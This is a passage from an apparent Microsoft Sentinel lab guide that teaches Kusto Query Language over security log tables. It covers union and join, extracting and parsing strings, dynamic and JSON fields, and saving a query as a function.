317 | **Query 3** will return all rows of SecurityEvent and one row for SigninLogs. The row for SigninLogs will have the count of the SigninLogs rows.
318 |
319 | ```KQL
320 | SecurityEvent
321 | | union (SigninLogs | summarize count() | project count_)
322 | ```
323 |
324 | 2. The following statement demonstrates the union operator support for wildcards to union multiple tables. In the Query Window. Enter the following statement and select **Run**:
325 |
326 | ```KQL
327 | union Security*
328 | | summarize count() by Type
329 | ```
330 |
331 | 3. The following statement demonstrates the join operator, which merges the rows of two tables to form a new table by matching the specified columns' values from each table. In the Query Window. Enter the following statement and select **Run**:
332 |
333 | ```KQL
334 | SecurityEvent
335 | | where EventID == "4624"
336 | | summarize LogOnCount=count() by EventID, Account
337 | | project LogOnCount, Account
338 | | join kind = inner (
339 | SecurityEvent
340 | | where EventID == "4634"
341 | | summarize LogOffCount=count() by EventID, Account
342 | | project LogOffCount, Account
343 | ) on Account
344 | ```
345 |
346 | The first table specified in the join is considered the Left table. The table after the join keyword is the right table. When working with columns from the tables, the $left.Column name and $right.Column name is to distinguish which tables column are referenced.
347 |
348 |
349 | ### Task 6: Work with string data in KQL
350 |
351 | In this task, you will work with structured and unstructured string fields with KQL statements.
352 |
353 | 1. The following statement demonstrates the extract function(). Extract gets a match for a regular expression from a text string. You have the option to convert the extracted substring to the indicated type. In the Query Window. Enter the following statement and select **Run**:
354 |
355 | ```KQL
356 | print extract("x=([0-9.]+)", 1, "hello x=45.6|wo") == "45.6"
357 | ```
358 |
359 | 2. The following statements use the extract() function to pull out the Account Name from the Account field of the SecurityEvent table. In the Query Window. Enter the following statement and select **Run**:
360 |
361 | ```KQL
362 | SecurityEvent
363 | | where EventID == 4672 and AccountType == 'User'
364 | | extend Account_Name = extract(@"^(.*\\)?([^@]*)(@.*)?$", 2, tolower(Account))
365 | | summarize LoginCount = count() by Account_Name
366 | | where Account_Name != ""
367 | | where LoginCount < 10
368 | ```
369 |
370 | 3. The following statement demonstrates the parse operator. Parse evaluates a string expression and parses its value into one or more calculated columns. The computed columns will have nulls for unsuccessfully parsed strings.
371 |
372 | ```KQL
373 | let Traces = datatable(EventText:string)
374 | [
375 | "Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=23, lockTime=02/17/2016 08:40:01, releaseTime=02/17/2016 08:40:01, previousLockTime=02/17/2016 08:39:01)",
376 | "Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=15, lockTime=02/17/2016 08:40:00, releaseTime=02/17/2016 08:40:00, previousLockTime=02/17/2016 08:39:00)",
377 | "Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=20, lockTime=02/17/2016 08:40:01, releaseTime=02/17/2016 08:40:01, previousLockTime=02/17/2016 08:39:01)",
378 | "Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=22, lockTime=02/17/2016 08:41:01, releaseTime=02/17/2016 08:41:00, previousLockTime=02/17/2016 08:40:01)",
379 | "Event: NotifySliceRelease (resourceName=PipelineScheduler, totalSlices=27, sliceNumber=16, lockTime=02/17/2016 08:41:00, releaseTime=02/17/2016 08:41:00, previousLockTime=02/17/2016 08:40:00)"
380 | ];
381 | Traces
382 | | parse EventText with * "resourceName=" resourceName ", totalSlices=" totalSlices:long * "sliceNumber=" sliceNumber:long * "lockTime=" lockTime ", releaseTime=" releaseTime:date "," * "previousLockTime=" previousLockTime:date ")" *
383 | | project resourceName, totalSlices, sliceNumber, lockTime, releaseTime, previousLockTime
384 | ```
385 |
386 | 4. The following statement demonstrates working with dynamic fields, which are special since they can take on any value of other data types. In this example, The DeviceDetail field from the SigninLogs table is of type dynamic. In the Query Window enter the following statement and select Run:
387 |
388 |
389 | ```KQL
390 | SigninLogs
391 | | extend OS = DeviceDetail.operatingSystem
392 | ```
393 |
394 | 5. The following example shows how to break out packed fields for SigninLogs. In the Query Window enter the following statement and select Run:
395 |
396 |
397 | ```KQL
398 | SigninLogs
399 | | extend OS = DeviceDetail.operatingSystem, Browser = DeviceDetail.browser
400 | | extend StatusCode = tostring(Status.errorCode), StatusDetails = tostring(Status.additionalDetails)
401 | | extend Date = startofday(TimeGenerated)
402 | | summarize count() by Date, Identity, UserDisplayName, UserPrincipalName, IPAddress, ResultType, ResultDescription, StatusCode, StatusDetails, ConditionalAccessPol0Name, ConditionalAccessPol0Result, ConditionalAccessPol1Name, ConditionalAccessPol1Result, ConditionalAccessPol2Name, ConditionalAccessPol2Result, Location, State, City
403 | | sort by Date
404 | ```
405 |
406 | 6. The following statement demonstrates operators to manipulate JSON stored in string fields. Many logs submit data in JSON format, which requires you to know how to transform JSON data to queryable fields.
407 |
408 | In the Query Window. Enter the following statements individually and select **Run**:
409 |
410 | ```KQL
411 | SigninLogs
412 | | extend AuthDetails = todynamic(AuthenticationDetails)
413 | | extend AuthMethod = AuthDetails[0].authenticationMethod
414 | | extend AuthResult = AuthDetails[0].["authenticationStepResultDetail"]
415 | | project AuthMethod, AuthResult, AuthDetails
416 | ```
417 | The mv-expand operator expands multi-value dynamic arrays or property bags into multiple records.
418 |
419 | ```KQL
420 | SigninLogs
421 | | mv-expand AuthDetails = todynamic(AuthenticationDetails)
422 | | project AuthDetails
423 | ```
424 | The mv-apply operator applies a subquery to each record and returns the union of the results of all subqueries.
425 |
426 | ```KQL
427 | SigninLogs
428 | | mv-apply AuthDetails = todynamic(AuthenticationDetails) on
429 | (where AuthDetails.authenticationMethod == "Password")
430 | ```
431 |
432 | 7. To create a function:
433 |
434 | >**Note:** You will not be able to do this in the lademo environment used for data in this lab, but it's an important concept to be used in your environment.
435 |
436 | After running a query, select the **Save** button and then select **Save As function** from the drop-down. Enter the name your want, for example: *PrivLogins* in the **Function name** box and enter a **Legacy category**, like *General* and select **Save**.
437 |
438 | The function will be available in KQL by using the function alias:
439 |
440 | ```KQL
441 | PrivLogins
442 | ```
443 |
444 | ## You have completed the lab.
445 |
--------------------------------------------------------------------------------